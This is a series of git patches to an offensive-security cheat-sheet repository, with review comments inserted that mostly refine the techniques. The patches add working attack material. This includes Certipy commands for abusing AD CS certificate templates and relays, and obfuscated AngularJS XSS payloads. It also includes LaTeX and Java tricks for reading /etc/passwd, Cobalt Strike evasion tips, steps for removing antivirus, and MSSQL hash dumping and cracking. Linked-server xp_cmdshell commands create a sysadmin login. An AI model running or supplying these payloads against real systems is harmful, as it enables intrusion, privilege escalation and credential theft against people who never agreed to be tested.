@@ -2213,11 +2217,12 @@ Exploitation:
or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
```
-* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate)
+* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
```ps1
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
+ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
```
* Use OpenSSL and convert the certificate, do not enter a password
```ps1
@@ -2246,6 +2251,21 @@ Exploitation:
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
+#### ESC3 - Misconfigured Enrollment Agent Templates
+
+> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
+
+* Request a certificate based on the vulnerable certificate template ESC3.
+ ```ps1
+ $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
+ [*] Saved certificate and private key to 'john.pfx'
+ ```
+* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
+ ```ps1
+ $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
+ ```
+
+
#### ESC4 - Access Control Vulnerabilities
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
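Review bot: The ESC3 description stops at the Certificate Request Agent EKU, but the second `certipy req ... -on-behalf-of` call only succeeds when the target template (here `User`) is itself enrollable by the attacker and accepts an enrollment-agent signed request (as I recall from the original ESC3 write-up: an authorized-signature requirement of 1 with the Certificate Request Agent application policy, or a schema version 1 template), and when the CA has no enrollment agent restrictions configured. Without that caveat a reader will try the second step against an arbitrary template and conclude the technique failed. I would extend the blockquote with `The second template must accept enrollment-agent co-signed requests (or be a schema v1 template) and the CA must not restrict enrollment agents.` The bullet text `on behalf of other another user` also has a stray word.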
@@ -2266,6 +2286,17 @@ Exploitation:
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
```
+Using Certipy
+
+```ps1
+# overwrite the configuration to make it vulnerable to ESC1
+certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
+# request a certificate based on the ESC4 template, just like ESC1.
+certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
+# restore the old configuration
+certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
+```
+
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
@@ -2287,7 +2318,7 @@ Mitigation:
#### ESC7 - Vulnerable Certificate Authority Access Control
Exploitation:
-* Detect CAs that allow low privileged users the ManageCA permission
+* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
```ps1
Certify.exe find /vulnerable
```
@@ -2387,6 +2418,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
```
+* Version 4: Certipy ESC8
+ ```ps1
+ certipy relay -ca 172.16.19.100
+ ```
### Dangerous Built-in Groups Usage
From b8387bc3a59c1f19c7d2e0df9bcf78ac11bd2f32 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Radoslav=20Bod=C3=B3?=
Date: Tue, 22 Feb 2022 15:57:04 +0100
Subject: [PATCH 34/50] LaTeX Injection catcode
add `\catcode` to disable LaTex control characters
---
LaTeX Injection/README.md | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md
index 6c9d9cb..dbf0bc2 100644
--- a/LaTeX Injection/README.md
+++ b/LaTeX Injection/README.md
@@ -38,6 +38,18 @@ Read text file, **without** interpreting the content, it will only paste raw fil
\verbatiminput{/etc/passwd}
```
+If injection point is past document header (`\usepackage` cannot be used), some control
+characters can be deactivated in order to use `\input` on file containing `$`, `#`,
+`_`, `&`, null bytes, ... (eg. perl scripts).
+
+```tex
+\catcode `\$=12
+\catcode `\#=12
+\catcode `\_=12
+\catcode `\&=12
+\input{path_to_script.pl}
+```
+
## Write file
Write single lined file:
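Review bot: The `\catcode` list neutralises `$`, `#`, `_` and `&` but leaves `%`, `^` and `~` active, so a script containing a `%` loses the rest of that line when it is `\input`, and the introduction mentions null bytes although the snippet does nothing about them. I would add `\catcode`\%=12`, `\catcode`\^=12` and `\catcode`\~=12` to the list, and state that backslashes and braces in the target file are still interpreted (the backslash has to stay active for `\input` itself to work), so the trick suits files without TeX control characters rather than arbitrary content. The null-byte claim should either be dropped or backed by the matching `\catcode` change for `^^@`, since how it is treated depends on the engine and format.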
From 5d898e004f07fbdb1a8b4aeaf3f0263d5e0116f8 Mon Sep 17 00:00:00 2001
From: ktq-cyber
Date: Wed, 23 Feb 2022 22:26:16 +0700
Subject: [PATCH 35/50] [update] Angular XSS payload
---
XSS Injection/XSS in Angular.md | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md
index 5a2be10..629699b 100644
--- a/XSS Injection/XSS in Angular.md
+++ b/XSS Injection/XSS in Angular.md
@@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
```
+AngularJS (without `'` single and `"` double quotes and `constructor` string)
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
### Blind XSS
From 521975a05c4abb2066a03e8aaa6065b13fbc00ae Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 1 Mar 2022 23:01:25 +0100
Subject: [PATCH 36/50] AV Removal + Cobalt SleepKit
---
.../Active Directory Attack.md | 1 +
.../Cobalt Strike - Cheatsheet.md | 129 +++++++-----------
.../Windows - Persistence.md | 17 ++-
3 files changed, 66 insertions(+), 81 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 4b118b5..ef83864 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -232,6 +232,7 @@ Use the correct collector
.\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
.\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
+ .\SharpHound.exe -c all,GPOLocalGroup --searchforest
# or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index c0f374e..9ddee11 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
@@ -18,7 +18,8 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Infrastructure](#infrastructure)
* [Redirectors](#redirectors)
* [Domain fronting](#domain-fronting)
- * [OpSec](#opsec)
+* [OpSec](#opsec)
+ * [Customer ID](#customer-id)
* [Payloads](#payloads)
* [DNS Beacon](#dns-beacon)
* [SMB Beacon](#smb-beacon)
@@ -37,6 +38,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit)
+* [Beacon Object Files](#beacon-object-files)
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
* [References](#references)
@@ -53,14 +55,14 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
### Domain Fronting
* New Listener > HTTP Host Header
-* Target Finance & Healthcare domains
+* Choose a domain in "Finance & Healthcare" sector
-### OpSec
+## OpSec
**Don't**
-* Change default self-signed HTTPS certificate
-* Change default port (50050)
-* 0.0.0.0 DNS response
+* Use default self-signed HTTPS certificate
+* Use default port (50050)
+* Use 0.0.0.0 DNS response
* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
**Do**
@@ -69,9 +71,17 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
* Firewall 50050 and access via SSH tunnel
* Edit default HTTP 404 page and Content type: text/plain
* No staging `set hosts_stage` to `false` in Malleable C2
+* Use Malleable Profile to taylor your attack to specific actors
+### Customer ID
-## Payload
+> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.
+
+* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
+* The trial has a Customer ID value of 0.
+* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool
+
+## Payloads
### DNS Beacon
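Review bot: `Use Malleable Profile to taylor your attack` should read `tailor`. The Customer ID bullets state that the 4-byte value tied to a licence is embedded in every stager and stage, but leave out the operational consequence: a payload recovered by a blue team is attributable to the licence that built it, and by extension to every other operation run with that key. That belongs in the OpSec list, e.g. `* The Customer ID is a watermark: recovered stagers/stages can be tied back to the licence that generated them`.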
@@ -167,11 +177,14 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
## Malleable C2
+List of Malleable Profiles hosted on Github
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
+Example of syntax
+
```powershell
set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
@@ -186,75 +199,10 @@ prepend "!@#$%^&*()";
```
Check a profile with `./c2lint`.
-
-```powershell
-#
-# Etumbot Profile
-# http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/
-#
-# Author: @harmj0y
-#
-set sample_name "Etumbot";
-set sleeptime "5000";
-set jitter "0";
-set maxdns "255";
-set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
-
-http-get {
- set uri "/image/";
- client {
- header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
- header "Referer" "http://www.google.com";
- header "Pragma" "no-cache";
- header "Cache-Control" "no-cache";
- metadata {
- netbios;
- append "-.jpg";
- uri-append;
- }
- }
-
- server {
- header "Content-Type" "img/jpg";
- header "Server" "Microsoft-IIS/6.0";
- header "X-Powered-By" "ASP.NET";
- output {
- base64;
- print;
- }
- }
-}
-
-http-post {
- set uri "/history/";
- client {
- header "Content-Type" "application/octet-stream";
- header "Referer" "http://www.google.com";
- header "Pragma" "no-cache";
- header "Cache-Control" "no-cache";
- id {
- netbiosu;
- append ".asp";
- uri-append;
- }
- output {
- base64;
- print;
- }
- }
-
- server {
- header "Content-Type" "img/jpg";
- header "Server" "Microsoft-IIS/6.0";
- header "X-Powered-By" "ASP.NET";
- output {
- base64;
- print;
- }
- }
-}
-```
-
+* A result of 0 is returned if c2lint completes with no errors
+* A result of 1 is returned if c2lint completes with only warnings
+* A result of 2 is returned if c2lint completes with only errors
+* A result of 3 is returned if c2lint completes with both errors and warning
## Files
@@ -474,6 +422,32 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
* Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal
+### Sleep Mask Kit
+
+> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
+
+Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
+
+
+## Beacon Object Files
+
+> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
+
+Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h
+
+* Compile
+ ```ps1
+ # To compile this with Visual Studio:
+ cl.exe /c /GS- hello.c /Fohello.o
+
+ # To compile this with x86 MinGW:
+ i686-w64-mingw32-gcc -c hello.c -o hello.o
+
+ # To compile this with x64 MinGW:
+ x86_64-w64-mingw32-gcc -c hello.c -o hello.o
+ ```
+* Execute: `inline-execute /path/to/hello.o`
+
## NTLM Relaying via Cobalt Strike
```powershell
@@ -501,4 +475,5 @@ beacon> PortBender redirect 445 8445
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
-* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
\ No newline at end of file
+* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
+* [Cobalt Strike 4.5 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 3c5252c..5e3c9a2 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -4,8 +4,10 @@
* [Tools](#tools)
* [Hide Your Binary](#hide-your-binary)
-* [Disable Windows Defender](#disable-windows-defender)
-* [Disable Windows Firewall](#disable-windows-firewall)
+* [Disable Antivirus and Security](#disable-antivirus-and-security)
+ * [Antivirus Removal](#antivirus-removal)
+ * [Disable Windows Defender](#disable-windows-defender)
+ * [Disable Windows Firewall](#disable-windows-firewall)
* [Simple User](#simple-user)
* [Registry HKCU](#registry-hkcu)
* [Startup](#startup)
@@ -47,7 +49,14 @@
PS> attrib +h mimikatz.exe
```
-## Disable Windows Defender
+## Disable Antivirus and Security
+
+### Antivirus Removal
+
+* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
+* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
+
+### Disable Windows Defender
```powershell
# Disable Defender
@@ -68,7 +77,7 @@ Add-MpPreference -ExclusionPath C:\Video, C:\install
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
```
-## Disable Windows Firewall
+### Disable Windows Firewall
```powershell
Netsh Advfirewall show allprofiles
From 540d3ca399321618fabb417fa7d5d6aa4eb07ee5 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 5 Mar 2022 18:31:15 +0100
Subject: [PATCH 37/50] Vajra + MSSQL hashes
---
.../Cloud - Azure Pentest.md | 10 +++++++++-
.../MSSQL Server - Cheatsheet.md | 16 ++++++++++++++++
.../Windows - Privilege Escalation.md | 10 ++++++++++
3 files changed, 35 insertions(+), 1 deletion(-)
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index ca9c9e0..65dc4d7 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md
+++ b/Methodology and Resources/Cloud - Azure Pentest.md
@@ -13,6 +13,10 @@
* [Enumeration methodology](#enumeration-methodology)
* [Phishing with Evilginx2](#phishing-with-evilginx2)
* [Illicit Consent Grant](#illicit-consent-grant)
+ * [Register Application](#register-application)
+ * [Configure Application](#configure-application)
+ * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
+ * [Setup Vajra](#setup-vajra)
* [Device Code Phish](#device-code-phish)
* [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell)
@@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
* User.ReadBasic.All
* User.Read
-### Setup 365-Stealer
+### Setup 365-Stealer (Deprecated)
:warning: Default port for 365-Stealer phishing is 443
@@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
- `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
- Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console.
+### Setup Vajra
+
+> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
+
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index 485649a..7c693f0 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md
@@ -54,6 +54,7 @@
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
* [Exploiting Impersonation](#exploiting-impersonation)
* [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
+ * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
* [References](#references)
## Identify Instances and Databases
@@ -537,6 +538,21 @@ SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER
```
+### MSSQL Accounts and Hashes
+
+```sql
+SELECT name, password_hash FROM sys.sql_logins
+```
+
+Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
+
+```ps1
+131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+```
+
+
## References
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
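Review bot: The hashcat line passes `--force`, which tells hashcat to ignore its own warnings (unsupported driver, unstable kernel) and can silently produce missed or wrong results; it does not belong in a copy-paste example, so I would drop it and leave the reader to add it only once they understand the warning they are overriding. The `sys.sql_logins` query also returns `password_hash` only to a caller with sufficient server-level permission (CONTROL SERVER, i.e. sysadmin in practice, as far as I remember from the catalog view documentation); for a lower-privileged login the column comes back NULL, which a reader could misread as "no SQL logins". A one-line note above the query such as `-- password_hash is NULL unless you hold CONTROL SERVER` would prevent that.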
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 8743b0f..7aa2995 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -14,6 +14,7 @@
* [Default Writeable Folders](#default-writeable-folders)
* [EoP - Looting for passwords](#eop---looting-for-passwords)
* [SAM and SYSTEM files](#sam-and-system-files)
+ * [LAPS Settings](#laps-settings)
* [HiveNightmare](#hivenightmare)
* [Search for file contents](#search-for-file-contents)
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
@@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt
Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
+### LAPS Settings
+
+Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
+
+* LAPS Enabled: AdmPwdEnabled
+* LAPS Admin Account Name: AdminAccountName
+* LAPS Password Complexity: PasswordComplexity
+* LAPS Password Length: PasswordLength
+* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
### HiveNightmare
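Review bot: The new "LAPS Settings" section sits under "Looting for passwords", but none of the listed values holds a password: `AdmPwdEnabled`, `AdminAccountName`, `PasswordComplexity`, `PasswordLength` and `PwdExpirationProtectionEnabled` only tell you that LAPS is deployed and which local account it rotates. The secret itself is stored in the computer object's `ms-Mcs-AdmPwd` attribute in Active Directory (with the expiry in `ms-Mcs-AdmPwdExpirationTime`) and is readable only by principals delegated that right, so the section should say so and point the reader at the AD side for retrieval. I would open it with `These keys reveal the LAPS configuration, not the password; the managed password lives in the computer object's ms-Mcs-AdmPwd attribute and requires delegated read access.`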
From 4abd52697f2fb9be94e0d785c77e4af5119efcd0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 10 Mar 2022 11:05:17 +0100
Subject: [PATCH 38/50] MSSQL Agent Command Execution
---
Directory Traversal/README.md | 10 ++
.../Active Directory Attack.md | 7 +-
.../MSSQL Server - Cheatsheet.md | 99 +++++++++++++++++--
.../Windows - Persistence.md | 8 ++
SQL Injection/MSSQL Injection.md | 2 +-
5 files changed, 113 insertions(+), 13 deletions(-)
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index e459021..665af6c 100644
--- a/Directory Traversal/README.md
+++ b/Directory Traversal/README.md
@@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
+### Java Bypass
+
+Bypass Java's URL protocol
+
+```powershell
+url:file:///etc/passwd
+url:http://127.0.0.1:8080
+```
+
+
## Path Traversal
### Interesting Linux files
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index ef83864..5df6bc9 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt
Useful when you want to have the clear text password or when you need to make stats about weak passwords.
Recommended wordlists:
-- rockyou (available in Kali Linux)
-- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
-- Weakpass.com
+- [Rockyou.txt](https://weakpass.com/wordlist/90)
+- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
+- [Weakpass.com](https://weakpass.com/)
- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md)
```powershell
@@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
-- ~~[hashes.org](https://hashes.org/check.php)~~
- [hashmob.net](https://hashmob.net)
- [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash)
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index 7c693f0..cfd9e9c 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md
@@ -14,6 +14,8 @@
* [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
* [Dump common information from server to files](#dump-common-information-from-server-to-files)
* [Linked Database](#linked-database)
+ * [Find Trusted Link](#find-trusted-link)
+ * [Execute Query Through The Link](#execute-query-through-the-link)
* [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
* [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
* [Query Version of Linked Database](#query-version-of-linked-database)
@@ -22,7 +24,7 @@
* [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
* [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
* [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
- * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
+* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
* [Extended Stored Procedure](#extended-stored-procedure)
* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
* [CLR Assemblies](#clr-assemblies)
@@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
## Linked Database
+### Find Trusted Link
+
+```sql
+select * from master..sysservers
+```
+
+### Execute Query Through The Link
+
+```sql
+-- execute query through the link
+select * from openquery("dcorp-sql1", 'select * from master..sysservers')
+select version from openquery("linkedserver", 'select @@version as version');
+
+-- chain multiple openquery
+select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+
+-- execute shell commands
+EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
+select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+
+-- create user and give admin privileges
+EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+```
+
### Crawl Links for Instances in the Domain
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
@@ -195,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque
```
-### Command Execution via xp_cmdshell
+## Command Execution via xp_cmdshell
> xp_cmdshell disabled by default since SQL Server 2005
```ps1
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami
-Creates and adds local user backup to the local administrators group:
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose
-Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami
+
+# Creates and adds local user backup to the local administrators group:
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose
+PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose
```
+* Manually execute the SQL query
+ ```sql
+ EXEC xp_cmdshell "net user";
+ EXEC master..xp_cmdshell 'whoami'
+ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
+ EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
+ ```
+* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+ ```sql
+ EXEC sp_configure 'show advanced options',1;
+ RECONFIGURE;
+ EXEC sp_configure 'xp_cmdshell',1;
